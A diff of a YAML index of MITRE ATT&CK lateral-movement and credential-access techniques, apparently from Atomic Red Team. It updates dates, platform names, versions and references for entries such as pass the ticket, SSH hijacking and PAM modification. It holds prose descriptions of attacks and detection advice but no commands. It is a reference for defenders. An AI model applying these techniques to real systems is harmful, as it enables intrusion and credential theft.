         Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
 
@@ -46487,7 +47175,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -46503,61 +47190,62 @@ lateral-movement:
       id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
       created: '2020-02-11T18:28:44.950Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1021/005
         external_id: T1021.005
-      - source_name: The Remote Framebuffer Protocol
-        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
-          Framebuffer Protocol. Retrieved September 20, 2021.
-        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: Attacking VNC Servers PentestLab
+        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+          VNC Servers. Retrieved October 6, 2021.
+        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
       - source_name: MacOS VNC software for Remote Desktop
         description: Apple Support. (n.d.). Set up a computer running VNC software
           for Remote Desktop. Retrieved August 18, 2021.
         url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
-      - source_name: VNC Authentication
-        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
-          September 20, 2021.
-        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
-      - source_name: Hijacking VNC
-        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
-          Access and Crack). Retrieved September 20, 2021.'
-        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+      - source_name: Havana authentication bug
+        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+          seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+        url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
       - source_name: macOS root VNC login without authentication
         description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
           root account without authentication. Retrieved September 20, 2021.
         url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
-      - source_name: VNC Vulnerabilities
-        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
-          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
-        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
       - source_name: Offensive Security VNC Authentication Check
         description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
           6, 2021.
         url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
-      - source_name: Attacking VNC Servers PentestLab
-        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
-          VNC Servers. Retrieved October 6, 2021.
-        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
-      - source_name: Havana authentication bug
-        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
-          seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
-        url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
-      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
-        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
-          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
-          August 19, 2021.'
-        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
       - source_name: Gnome Remote Desktop grd-settings
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
       - source_name: Gnome Remote Desktop gschema
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+          August 19, 2021.'
+        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+      - source_name: VNC Vulnerabilities
+        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+      - source_name: The Remote Framebuffer Protocol
+        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+          Framebuffer Protocol. Retrieved September 20, 2021.
+        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: VNC Authentication
+        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+          September 20, 2021.
+        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+      - source_name: Hijacking VNC
+        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+          Access and Crack). Retrieved September 20, 2021.'
+        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1021.005
     atomic_tests:
     - name: Enable Apple Remote Desktop Agent
@@ -46581,7 +47269,7 @@ lateral-movement:
         elevation_required: true
   T1080:
     technique:
-      modified: '2023-05-31T12:33:20.915Z'
+      modified: '2024-10-15T16:07:36.903Z'
       name: Taint Shared Content
       description: |2-
 
@@ -46606,11 +47294,11 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
       - Linux
       - macOS
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Network Share: Network Share Access'
       - 'Process: Process Creation'
@@ -46633,9 +47321,8 @@ lateral-movement:
         url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.004:
     technique:
@@ -46686,7 +47373,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.004
     atomic_tests: []
   T1091:
@@ -46750,7 +47436,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1021.008:
@@ -46821,7 +47506,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.001:
     technique:
@@ -46858,7 +47542,7 @@ lateral-movement:
         url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
         description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
           11 security incident. Retrieved February 17, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-23T23:11:24.682Z'
       name: SSH Hijacking
       description: |-
         Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
@@ -46889,8 +47573,6 @@ lateral-movement:
       - root
       x_mitre_system_requirements:
       - SSH service enabled, trust relationships configured, established connections
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1021.002:
     technique:
@@ -46973,12 +47655,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.002
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -47005,6 +47686,7 @@ lateral-movement:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -47022,12 +47704,12 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -47053,14 +47735,13 @@ lateral-movement:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021:
     technique:
@@ -47178,7 +47859,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563:
     technique:
@@ -47232,11 +47912,10 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.006:
     technique:
-      modified: '2023-08-11T15:26:41.941Z'
+      modified: '2024-09-12T15:28:23.398Z'
       name: 'Remote Services: Windows Remote Management'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -47288,14 +47967,13 @@ lateral-movement:
           April 27, 2016.
         url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
       - source_name: Microsoft WinRM
-        description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa384426
+        description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.006
     atomic_tests: []
   T1021.003:
@@ -47381,12 +48059,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.003
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -47406,6 +48083,7 @@ lateral-movement:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -47413,7 +48091,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -47429,39 +48106,40 @@ lateral-movement:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1021.007:
     technique:
-      modified: '2023-04-14T22:27:04.095Z'
+      modified: '2024-10-15T15:52:47.255Z'
       name: Cloud Services
       description: "Adversaries may log into accessible cloud services within a compromised
         environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -47486,12 +48164,11 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
-      - Azure AD
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       type: attack-pattern
@@ -47505,13 +48182,12 @@ lateral-movement:
         external_id: T1021.007
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -47528,7 +48204,7 @@ lateral-movement:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -47576,7 +48252,7 @@ lateral-movement:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -47609,7 +48285,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1210:
@@ -47648,7 +48323,7 @@ lateral-movement:
         description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
           Detail. Retrieved April 3, 2018.
         source_name: NVD CVE-2014-7169
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-24T15:06:46.006Z'
       name: Exploitation of Remote Services
       description: |-
         Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -47682,12 +48357,10 @@ lateral-movement:
         and goal, the system and exploitable service may need to be remotely accessible
         from the internal network.
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1534:
     technique:
-      modified: '2024-02-16T13:09:39.215Z'
+      modified: '2024-10-15T15:59:36.741Z'
       name: Internal Spearphishing
       description: |-
         After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -47715,10 +48388,9 @@ lateral-movement:
       - Windows
       - macOS
       - Linux
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -47748,7 +48420,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1570:
     technique:
@@ -47810,12 +48481,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1570
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -47839,11 +48509,10 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -47868,9 +48537,8 @@ lateral-movement:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.002:
     technique:
@@ -47930,7 +48598,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1563.002
     atomic_tests: []
   T1550.002:
@@ -47985,7 +48652,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1021.001:
@@ -48053,12 +48719,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.001
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -48115,6 +48780,7 @@ lateral-movement:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -48125,13 +48791,12 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -48190,7 +48855,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 credential-access:
   T1557:
@@ -48284,49 +48948,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -48341,20 +48966,57 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
